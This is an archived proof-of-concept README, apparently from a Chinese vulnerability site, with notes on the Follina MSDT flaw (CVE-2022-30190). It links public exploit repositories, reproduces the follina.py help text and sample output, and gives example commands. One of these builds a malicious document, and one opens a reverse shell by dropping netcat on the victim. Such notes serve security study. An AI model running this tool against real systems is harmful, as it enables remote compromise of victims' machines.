关联漏洞
描述
Notes related to CVE-2022-30190
介绍
# Follina
Notes related to CVE-2022-30190
FOLLINA: CVE-2022-30190
1. Uses Microsoft Support Diagnostic Tool (MSDT)
2. Exploits diagnostic window opened for Diagnosis and when executed properly, gives reverse shell to attacker.
3. Github:
(a). https://github.com/JohnHammond/msdt-follina
(b). https://github.com/chvancooten/follina.py
4. Thanks to:
(a). @_johnhammond
(b). @networkchuck
5. Usage
follina.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]
options:
-h, --help show this help message and exit
--command COMMAND, -c COMMAND
command to run on the target (default: calc)
--output OUTPUT, -o OUTPUT
output maldoc file (default: ./follina.doc)
--interface INTERFACE, -i INTERFACE
network interface or IP address to host the HTTP server (default: eth0)
--port PORT, -p PORT port to serve the HTTP server (default: 8000)
6. Examples
(a). Pop calc.exe:
$ python3 follina.py
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./follina.doc
[+] serving html payload on :8000
(b). Pop notepad.exe:
$ python3 follina.py -c "notepad"
(c). Get a reverse shell on port 9001.
Note, this downloads a netcat binary onto the victim and places it in C:\Windows\Tasks. It does not clean up the binary. This will trigger
antivirus detections unless AV is disabled.
$ python3 follina.py -r 9001
文件快照
[4.0K] /data/pocs/2b8a3e4bcb2d832f819df91de0d567d988724b6b
└── [1.6K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。